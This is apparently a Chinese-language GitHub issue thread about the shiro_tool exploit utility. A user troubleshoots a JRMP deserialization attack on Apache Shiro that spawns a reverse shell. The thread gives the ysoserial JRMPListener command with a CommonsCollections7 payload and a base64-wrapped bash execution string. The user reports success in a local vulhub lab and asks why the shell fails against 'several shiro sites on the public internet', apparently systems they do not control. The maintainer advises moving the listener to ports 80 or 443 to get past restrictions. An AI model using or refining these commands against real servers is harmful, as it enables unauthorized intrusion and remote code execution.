xiaozhaha
commented
1 year ago JRMPListener 也是有响应的,但是shell回不来。
Open xiaozhaha opened 1 year ago
xiaozhaha
commented
1 year ago JRMPListener 也是有响应的,但是shell回不来。
xiaozhaha
commented
1 year ago 终于有一个JRMP的打成功了,前面应该是网站限制了。师傅,瑞思拜!👍😁🫡 师傅有联系方式可以提供下吗?还有一些地方不是很明白。
wyzxxz
commented
1 year ago 端口换到80,443等常见端口
xiaozhaha
commented
1 year ago 是 6789 端口换 80 443 这些常见端口这个意思吗? 另外 这个执行命令的时候,如果需要base64,是不是这样输入的啊? bash -c {echo,xxx}|{base64,-d}|{bash,-i}
wyzxxz
commented
1 year ago 例如 bash=ls,会转成这种格式 bash -c {echo,bHM=}|{base64,-d}|{bash,-i}
请问师傅,在base64编码的情况下,我使用的命令错了吗?
另外,我主要是想用这个工具来学习下JRMP打shiro的方法。我的命令如下
java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 6789 CommonsCollections7 "bash -c {echo,xxx}|{base64,-d}|{bash,-i}"然后 shiro_tool.jar 选择 JRMPClient 对应的数字。 填入上面跑 ysoserial-all.jar 的 ip:6789 这样在我本地vulhub搭建的环境里面,是可以弹shell回来的,但是我公网找了好几个shiro站点,就是弹不回来,可以确定不是我vps没开端口或其它的原因,dnslog也是有记录的,这会是什么原因啊?🫡